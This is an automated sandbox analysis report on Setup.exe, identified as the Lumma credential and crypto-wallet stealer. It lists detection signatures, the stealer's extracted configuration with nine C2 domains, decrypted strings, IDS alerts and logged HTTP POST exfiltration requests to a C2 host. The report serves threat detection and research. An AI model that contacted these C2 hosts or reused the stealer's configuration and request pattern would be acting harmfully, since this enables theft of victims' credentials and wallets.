Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:	Setup.exe
Analysis ID:	1577781
MD5:	8af6db9955abed6390bc281e0430ddc3
SHA1:	fce22724af26d5242f04697c893166051d1dc797
SHA256:	150f955296353908a81bb4dca5c4a5b7563a057d5ed63f56831bee5234010e1c
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Setup.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 8AF6DB9955ABED6390BC281E0430DDC3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat", "simplerapplau.click", "aspecteirs.lat", "discokeyus.lat", "grannyejh.lat"], "Build id": "subscript--"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Setup.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4ae7f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1297460093.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: Setup.exe PID: 7128	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Setup.exe PID: 7128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Setup.exe PID: 7128	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Setup.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T18:29:36.301287+0100	2028371	3	Unknown Traffic	192.168.2.7	49738	104.21.88.199	443	TCP
2024-12-18T18:29:41.250680+0100	2028371	3	Unknown Traffic	192.168.2.7	49749	104.21.88.199	443	TCP
2024-12-18T18:29:47.238820+0100	2028371	3	Unknown Traffic	192.168.2.7	49764	104.21.88.199	443	TCP
2024-12-18T18:29:50.238595+0100	2028371	3	Unknown Traffic	192.168.2.7	49769	104.21.88.199	443	TCP
2024-12-18T18:29:57.255718+0100	2028371	3	Unknown Traffic	192.168.2.7	49784	104.21.88.199	443	TCP
2024-12-18T18:30:03.299619+0100	2028371	3	Unknown Traffic	192.168.2.7	49795	104.21.88.199	443	TCP
2024-12-18T18:30:09.409773+0100	2028371	3	Unknown Traffic	192.168.2.7	49805	104.21.88.199	443	TCP
2024-12-18T18:30:14.346117+0100	2028371	3	Unknown Traffic	192.168.2.7	49819	104.21.88.199	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T18:29:39.998247+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49738	104.21.88.199	443	TCP
2024-12-18T18:29:45.620212+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49749	104.21.88.199	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T18:29:39.998247+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49738	104.21.88.199	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T18:29:45.620212+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49749	104.21.88.199	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T18:30:13.913664+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49805	104.21.88.199	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Setup.exe.7128.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat", "simplerapplau.click", "aspecteirs.lat", "discokeyus.lat", "grannyejh.lat"], "Build id": "subscript--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: simplerapplau.click
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp	String decryptor: hRjzG3--VIKA

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49805 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0884E332h]	0_2_02C272A2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_02C239FD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C2C3C7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_02C3F3B2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, esi	0_2_02C3E362
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+esi]	0_2_02C04302
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push eax	0_2_02C0D310
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-00000254h]	0_2_02C3C33F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A2347758h	0_2_02C24062
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], B22A55C5h	0_2_02C16073
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push esi	0_2_02C22165
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	0_2_02C236C2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-5557EE89h]	0_2_02C0A6F2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_02C38612
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02C2462C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx-32FA6DEDh]	0_2_02C2778F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_02C2C7AE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then push ebx	0_2_02C1E7B5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_02C2C7BD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then test eax, eax	0_2_02C38762
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], E785F9BAh	0_2_02C16769
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_02C2C76E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edx, esi	0_2_02C1D715
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_02C0A4D2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C284D4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C2C39B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C28499
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C2C423
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp word ptr [eax+edi+02h], 0000h	0_2_02C2942D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then lea esi, dword ptr [ecx-000000F0h]	0_2_02C2942D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02C35582
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then call dword ptr [00440D4Ch]	0_2_02C3C5AC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [ecx], si	0_2_02C1E560
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_02C1E560
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0EEE75ACh]	0_2_02C1E560
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_02C2B532
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_02C1CA71
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp eax	0_2_02C3DA23
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp dword ptr [00444AACh]	0_2_02C28BEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6Ch]	0_2_02C0AB42
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_02C0AB42
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+2Ch]	0_2_02C08B72
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_2_02C08B72
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1Ch]	0_2_02C18B3E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 4B1CCCDDh	0_2_02C0E8D9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+31D77F86h]	0_2_02C16882
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02C16882
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_02C2B9E2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ebp	0_2_02C1D9FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov esi, ecx	0_2_02C239FD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+000003F8h]	0_2_02C2D991
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C3E942
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	0_2_02C1CEDF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h]	0_2_02C1AEE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 888A0AE0h	0_2_02C1AEE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+08h]	0_2_02C1AEE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C3BEB0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+48AAB128h]	0_2_02C0CE5E
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_02C2AF82
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02C27F99
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov edi, esi	0_2_02C25F52
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], C703E6CDh	0_2_02C0DF7D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebp]	0_2_02C3CF1B
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C3BE33
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02C21CE2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp edx	0_2_02C23DCA
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then jmp edx	0_2_02C23DD2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5Fh]	0_2_02C37D72
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02C0BD32
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-46A948C7h]	0_2_02C1CD3D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-25h]	0_2_02C0CD3C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+38h]	0_2_02C0CD3C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49805 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49749 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49749 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49738 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49738 -> 104.21.88.199:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: simplerapplau.click
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: grannyejh.lat

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49738 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49749 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49805 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49795 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49819 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49769 -> 104.21.88.199:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49764 -> 104.21.88.199:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: simplerapplau.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: simplerapplau.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OSOPAWUPKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12789Host: simplerapplau.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=95U070K97User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15021Host: simplerapplau.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ON1XKKPRLZQFFSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20376Host: simplerapplau.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SK7ROEO9QI62User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1185Host: simplerapplau.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SFZ7MPLOIWOP2ZQLACUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1114Host: simplerapplau.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: simplerapplau.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: simplerapplau.click

Source: Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890224482.0000000001175000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Setup.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Setup.exe	String found in binary or memory: http://ocsp.digicert.com0N
Source: Setup.exe, 00000000.00000003.1701451407.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Setup.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Setup.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcp_beginbeuiafterafuiopenUsing_Trial_CopyThis
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htm?dcpregisteropenRegistered_SuccessfullyRegistered
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htmlatest_unreg_addBuy
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/buy.htmold_unreg_addBuy
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/download.htm7http://www.winxdvd.com/help/how-to-use-dvd-copy-pro
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/faq.htm1http://www.winxdvd.com/dvd-copy-pro/updatelog.htm9http:/
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/free-update.htm
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/free-update.htm?chlic13open
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htm
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmThe
Source: Setup.exe	String found in binary or memory: http://www.winxdvd.com/dvd-copy-pro/registered-update.htmlatest_reg_addEnjoy
